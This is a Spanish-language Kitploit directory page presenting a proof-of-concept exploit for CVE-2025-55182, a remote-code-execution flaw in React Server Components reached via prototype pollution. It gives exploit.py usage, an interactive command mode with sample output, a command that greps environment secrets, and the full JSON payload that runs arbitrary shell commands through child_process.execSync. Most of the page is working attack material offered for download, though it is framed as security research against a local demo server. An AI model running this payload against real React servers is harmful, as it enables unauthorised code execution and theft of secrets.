Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EXPLOIT-CVE-2025-55182 — Exploit de prueba de concepto para CVE-2025-55182 (React2Shell), una vulnerabilidad crítica de ejecución remota de código en los Componentes del Servidor React mediante contaminación de prototipos. Incluye modos de explotación interactivo y de línea de comandos. | Kitploit
Herramientas/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

Exploit de prueba de concepto para CVE-2025-55182 (React2Shell), una vulnerabilidad crítica de ejecución remota de código en los Componentes del Servidor React mediante contaminación de prototipos. Incluye modos de explotación interactivo y de línea de comandos.

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 Prueba de Concepto

CVE-2025-55182 React

Resumen

Una demostración práctica de CVE-2025-55182 (React2Shell) - una vulnerabilidad crítica de RCE en React Server Components.

Detalles de la Vulnerabilidad

  • CVE ID: CVE-2025-55182
  • Tipo: Ejecución Remota de Código mediante Contaminación de Prototipos (Prototype Pollution)
  • CVSS: 9.8 (CRÍTICO)
  • Afectado: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

Vector de Ataque

Los React Server Components deserializan FormData de manera insegura. Campos multipart especialmente diseñados provocan contaminación de prototipos y ejecutan código arbitrario a través de child_process.execSync.


Configuración Rápida

root@kitploit:~
npm install
pip3 install requests
npm run dev

La aplicación se ejecuta en: http://localhost:3000


Explotación

Uso Básico

root@kitploit:~
python3 exploit.py -c "whoami"

Ejemplos de Comandos

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

Modo Interactivo

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

Cómo Funciona

Estructura del Payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

Pruebas

Terminal 1: Iniciar servidor

root@kitploit:~
npm run dev

Terminal 2: Ejecutar exploit

root@kitploit:~
python3 exploit.py -c "whoami"

Modo Verboso

root@kitploit:~
python3 exploit.py -c "whoami" -v

Muestra la estructura completa del payload y la respuesta del servidor


Referencias

  • CVE-2025-55182 - NVD
  • React Security
  • OWASP Deserialization

Por Guaxinim | Investigación en Ciberseguridad

Descargar herramienta